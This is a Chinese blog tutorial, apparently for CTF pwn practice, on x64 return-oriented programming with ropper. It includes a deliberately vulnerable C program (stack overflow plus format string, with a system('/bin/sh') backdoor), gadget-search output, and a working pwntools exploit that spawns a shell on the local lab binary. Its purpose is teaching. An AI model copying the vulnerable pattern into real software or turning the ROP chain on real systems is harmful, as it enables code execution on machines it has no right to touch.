Pwn question_4_2_x64 ROP编程 以及 ropper初使用

已于 2022-04-24 17:44:57 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: Pwn 文章标签: ctf pwn
于 2022-04-23 21:41:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/124370473
版权

目录

1.ROP编程

1.安装ROPgadget

apt install python3-ropgadget

2.安装ropper

pip3 install ropper
  • 这里有我集成的pwntools一体化安装工具
git clone https://gitee.com/liweijun0302/pwntools_env.git

点击跳转

  • 以上两个工具都可以检测程序中的gadget
  • 区别在于ropper是多线程的。搜索速度快很多
  • 在打kernel之前与ROPgadget区别不大
  • 我们现在就直接使用ropper来搜索gadget

2.question_4_2_x64.c

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
char sh[] = "/bin/sh";

int func(){
    system(sh);
    return 0;
}

int dofunc(){
    char b[8] = {};
    puts("input:");
    read(0,b,0x30);
    printf(b);
    return 0;
}

int main(){
    dofunc();
    return 0;
}

3.函数分析

1.后门函数func()

  • 有后门函数就比较简单了
  • 只要控制程序执行func,并且把func的参数传递控制好即可
  • 控制x64的程序的函数传参就要用到ROP编程
  • 这里先简单介绍一下x64传参过程
    在这里插入图片描述
  • 如图所示
  • 这里要学一点64位传参的寄存器顺序

依次是 rdi rsi rdx rcx r8 r9

2.找到我们需要的gadget

  • 我们逐渐开始使用ropper
ropper -f question_4_2_x64

在这里插入图片描述

0x00000000004007a3: call qword ptr [rdi]; 
0x00000000004005a4: cmpsd dword ptr [rsi], dword ptr [rdi]; or ah, byte ptr [rax]; add byte ptr [rcx], al; pop rbp; ret; 
0x00000000004005cb: lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret; 
0x00000000004005c9: mov ebp, esp; lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret; 
0x00000000004005c8: mov rbp, rsp; lea rdi, [rip + 0x200a76]; call 0x4b0; mov eax, 0; pop rbp; ret; 
0x0000000000400614: mov rdi, rax; mov eax, 0; call 0x4c0; mov eax, 0; leave; ret; 
0x00000000004006a3: pop rdi; ret;
  • 为了方便加上grep
  • 找到了pop rdi;ret
  • 找一下bin/sh 的地址
pwndbg> search "bin/sh"
question_4_2_x64_30 0x601049 0x68732f6e6962 /* 'bin/sh' */
libc-2.27.so    0x7ffff7b95d89 0x650068732f6e6962 /* 'bin/sh' */
warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd0d05, halting search.
  • func的地址我们可以直接用elf去生成,我们就不必自己找了
  • 但是这里还是看一下
pwndbg> p &func
$1 = (<text variable, no debug info> *) 0x4005c7 <func>

4.编写exp

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = process('./question_4_2_x64_30')
# gdb,attach(io)
elf = ELF('question_4_2_x64_30')
pop_rdi_ret = 0x4006a3
bin_sh_addr = 0x601048
func_addr = elf.symbols['func']
payload = b'a'*16 + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(func_addr)
io.sendlineafter('input:',payload)
io.interactive()

5.看一下执行效果

在这里插入图片描述

==Microsoft==
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux pwn 基础知识
sky123博客
08-11 2541
环境搭建 虚拟机安装 镜像下载网站 为了避免环境问题建议 22.04 ,20.04,18.04,16.04 等常见版本 ubuntu 虚拟机环境各准备一份。注意定期更新快照以防意外。 虚拟机建议硬盘 256 G 以上,内存也尽量大一些。硬盘大小只是上界,256 G 不是真就占了 256 G,而后期如果硬盘空间不足会很麻烦。 基础工具 vim sudo apt install vim gedit 不习惯 vim 的可以使用 gedit 文本编辑器。 sudo apt install gedit git
Ubuntu下安装Ropper的坑
No Title
10-12 5159
Ubuntu下安装Ropper遇到的问题 最近研究内核Pwn需要用到Ropper找gadgets,安装过程中遇到了一系列糟心的事情,可以说能踩的坑被我一个不落的都踩了,记录一下。 Ropper安装前需要安装一些其他的依赖,首先安装capstone。 #pip install capstone ok这个没问题,但是一直提示pip版本过低,所以更新pip。 python -m pip install...
Ropper:显示有关不同文件格式的文件的信息,并找到用于为不同体系结构(x86x86_64,ARMARM64,MIPS,PowerPC,SPARC64)构建rop链的小工具。 对于拆卸,ropper使用了很棒的Capstone框架
05-12
罗珀 您可以使用ropper来显示有关不同文件格式的二进制文件的信息,还可以搜索小工具来构建针对不同体系结构(x86 / X86_64,ARM / ARM64,MIPS / MIPS64,PowerPC / PowerPC64,SPARC64)的rop链。 对于拆卸,ropper使用了很棒的。 安装 使用PyPi安装 : $ sudo pip install capstone 使用PyPi安装字节: $ sudo pip install filebytes 可选(无需运行ropper即可查找小工具): 安装: $ sudo pip install keystone-engine 安装并执行Ropper $ python setup.py install $ ropper 您还可以使用pip安装Ropper $ pip install ropper 如果需要,可以不安
PWN入门(5)32位程序与64位程序和构造ROP
Ba1_Ma0的博客
09-12 1657
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
Pwn 环境安装
潜心习安全
10-30 3306
Pwn 环境安装教程
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
开发者或学习者可以通过分析 "PWN.c" 的源代码了解如何在 AVR 上配置 PWM 定时器,以及如何通过编程控制 PWM 输出。同时,结合 "www.pudn.com.txt" 文件,可以获取项目背景、使用教程或其他相关资源。另外,项目可能...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
在电子设计自动化(EDA)领域,Verilog HDL(硬件描述语言)是一种广泛使用编程语言,用于描述数字系统的逻辑行为和结构。标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
Python库 | ropper-1.10.9.tar.gz
05-21
资源分类:Python库 所属语言:Python 资源全名:ropper-1.10.9.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | ropper-1.13.0.tar.gz
01-15
资源来自pypi官网。 资源全名:ropper-1.13.0.tar.gz
rop demo完整用例
07-16
本文是借助maven搭建的一个rop框架,以及一个简单的测试用例,供大家学习分享。如果发现不对的地方,希望大家留言提出,
pwn学习资料整理——ROP技术
recover517的博客
08-30 4532
1. 在32位程序中,参数是以什么形式进行传递的? 2. 在64位程序中,参数是以什么形式进行传递的? 3. 什么是return address? 4. 怎么利用控制栈空间来达到执行程序命令? 5. 32位中构造ROP 6. 64位中构造ROP
Ubuntu 16.04 for pwn
大风C9的专栏
08-15 6267
我的ubuntu 16.04配置,主要用于pwn
栈溢出的第一步进阶——ROP返回导向编程
XJJ的博客
05-01 724
前面两次栈溢出只是让我们学习原理,是最简单、最基本的栈溢出问题,一般的pwn题不会这么简单,溢出一次就可以到位。今天我们就做第一步进阶,正式进入ROP。 就我目前理解的ROP,就是要通过连续多次栈溢出,利用其原有的gadget(可以叫做代码片段),构造一次系统调用,调用execve()函数,就相当于获得了一个shell。首先我们要知道,系统调用的中断号是0x80,而execve的功能号是11,也就是16进制的0xb。所以在进行系统调用(即执行INT 80H这条语句)之前,我们先要构造出调用execve()
pwn环境搭建_kernel pwn 入门环境搭建
weixin_36298476的博客
01-12 609
刚开始上手kernel pwn,光环境就搭了好几天,应该是我太菜了。。好下面进入正题,环境总共就由两部分构成,qemu和gdb。这两个最好都需要使用源码安装。我使用安装环境为qemu:安装前要先安装sudo apt-get install libsdl2-2.0sudo apt-get install libsdl2-devsudo apt-get install libpixman--devs...
一步一步学ROP之linux_x64
weixin_34204057的博客
11-07 278
一步一步学ROP之linux_x64篇 一、序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击:《一步一步学ROP之linux_x86篇》,在这次的教程中我们会带来上...
John the Ripper破解密码
热门推荐
谢公子的博客
09-28 1万+
目录 John the Ripper 破解Linux系统密码 破解Windows系统密码 John the Ripper John the Ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值